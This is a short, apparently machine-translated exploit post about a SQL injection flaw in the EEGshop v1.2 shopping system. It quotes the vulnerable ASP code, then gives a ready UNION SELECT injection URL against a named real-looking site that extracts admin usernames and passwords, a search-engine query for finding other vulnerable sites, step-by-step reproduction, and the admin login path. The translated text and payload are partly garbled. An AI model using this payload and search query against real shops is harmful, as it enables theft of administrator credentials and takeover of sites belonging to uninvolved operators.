ShiDao Network
Tesco Online Shopping System EEGshop v1.2SQL Injection Vulnerability
In the user/shhr_inc.asp file, check the code here:
If request. QueryString ("action") = "edit" then
Id = request. QueryString ("id ")
If id = "" then response. End
Set rs = server. CreateObject ("adodb. recordset ")
Rs. open "select * from EEG_Consignee where username =" & checkFFSQLStr (request. cookies ("eeg_username") ("username") & "and id =" & id, conn, 1, 1
Only the username is checked, and the id is ignored.
Injection statement: http://www.hfsydg.com/User/shhr_inc.asp? Action = edit & id = 24% 20and % 201 = 2% 20 union % 20 select % ,,2, username, password, 9% 6, 20 from % 20eeg_admin % 20 where % 20id = 1
Google: inurl: eList. Asp? Act steps: register a user → [Continue to fill in details] → recipient → add receiver → Add a receiver → modify → you can see the id information in the address bar and inject it. Background: admin/Login. Asp